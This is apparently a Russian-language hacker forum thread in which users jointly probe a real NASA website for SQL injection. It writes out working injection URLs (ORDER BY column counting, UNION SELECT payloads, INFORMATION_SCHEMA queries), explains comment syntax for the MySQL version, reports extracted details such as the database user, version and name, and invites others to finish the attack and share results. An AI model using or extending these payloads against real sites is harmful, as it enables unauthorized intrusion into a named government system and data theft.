Smile! Ну, и, конечно, SQL-inject на NASA
 

Интересная ссылка, меня сразу заинтриговала:
umbra.nascom.nasa.gov/eit/eit_guide/listings/anal.htm
Я, безусловно, понимаю, что anal - это еще и дотошный, суетливый, и тем не менее.

А вот SQL-inject. Обработать грамотно мне не хватило времени, прошу тех, кто возьмется - сообщить результаты.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679'+order+by+14--
P. S. order by здесь не при делах.

ордер бай в мускле ВСЕГДА при делах.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'union+select+1,2,3,4,5,6,7/*

Я имел ввиду только то, что запрос с ORDER BY 14 не соответсвует реальному количеству столбцов \very SAD\.

2 ZaCo - а каким методом ты выяснил, что там string параметр? Просто по-опыту?

а при чем тут вообще 14? че ты мне гонишь. order by 7 последний. учитывая что это мусуль то это и есь последний тк на 8 ошибка.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa

Благодаря ZaCo выявил следующее:
USER() - web@localhost
VERSION - 4.0.14-standard
DATABASE() - eospso

2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*

И, что еще не понятнее - чем объясняется тот факт, что запрос с комментарием -- в конце не работает, а твой - пашет???

хотя бы потому что там 4 ветка. -- работает до конца строки, /* до конца запроса

А я пишу 'xa' в параметр и не вижу ничего!

Объясни, епожалуйста, если не лень, конечно про тип поподробнее.

Потому что INFORMATION_SCHEMA.COLUMNS в MSSQL.

я електу поставил, но не за тупость) а за ошибочное мнение. в пятой ветке мускля information_schema является системной таблицей.
1ten0.0net1 перебором - пробуешь строку, если прокатило то там можно попробовать поставить строковую функцию.